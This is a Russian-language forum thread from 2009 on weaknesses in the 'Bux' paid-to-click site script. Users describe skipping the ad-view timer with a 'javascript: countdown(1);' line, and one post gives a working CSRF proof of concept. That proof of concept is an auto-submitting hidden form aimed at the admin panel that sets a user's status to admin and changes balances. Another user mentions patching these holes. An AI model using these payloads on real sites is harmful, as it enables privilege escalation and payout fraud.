Уязвимости скрипта Bux

Discussion in 'Песочница' started by DIMON4G, 27 Oct 2008.

  1. tarantul13

    tarantul13 New Member

    Joined:
    30 Nov 2008
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Узнал о новом для меня способе накрутки буксов!
    Рассказываю:
    При просмотре рекламы, в адрес вставляется код и таймер сразу на 0 становится!..
    Это то вообщем, всё что я знаю! :)
    Может кто знает защиту от этого способа взлома?
     
    #21 tarantul13, 30 Jan 2009
    Last edited: 31 Jan 2009
  2. DIMON4G

    DIMON4G Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    0
    Likes Received:
    108
    Reputations:
    -1
    написалбы уязвимость для других, мож кто-то не знает, не 1 ты такой умный :p
     
  3. Alex_DeLarge

    Alex_DeLarge New Member

    Joined:
    4 Dec 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0


    Гг - этот новый букс выпущен практически со всеми старыми дырками - тоесть на него сногва пришлось все заплатки клепать!! Кстати кому интересно я всетаки защиты поставил и даже капчу почти доделал уже если интересно пишите 6321435
     
  4. Alex_DeLarge

    Alex_DeLarge New Member

    Joined:
    4 Dec 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0

    Я думаю он об этом: Если во время просмотра рекламы в строку браузера вставить такой вот скриптик
    Code:
    javascript: countdown(1);
    удалив при этом все что там есть то таймер сбивается на 1 секунду - так как с жабой я не дружу я не знаю как тут можно исправить!!!
     
  5. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    XSRF в скрипте Bux
    <form action="http://buxeg/admin/index.php?op=7" method="POST" name="theForm" id="theFormId">
    <input type="hidden" name="id" value="1">
    <input type="hidden" name="username" value="admin4eg">
    <input type="hidden" name="password" value="admin4eg">
    <input type="hidden" name="referer" value="">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="pemail" value="E105366777666">
    <input type="hidden" name="country" value="Russia">
    <input type="hidden" name="vistis" value="500">
    <input type="hidden" name="referals" value="600">
    <input type="hidden" name="referalvisits" value="777">
    <input type="hidden" name="money" value="500">
    <input type="hidden" name="user_status" value="admin">
    <input type="submit" value="���������" class="button">
    </form>

    <script type="text/javascript">
    document.theForm.submit();
    </script>
     
Loading...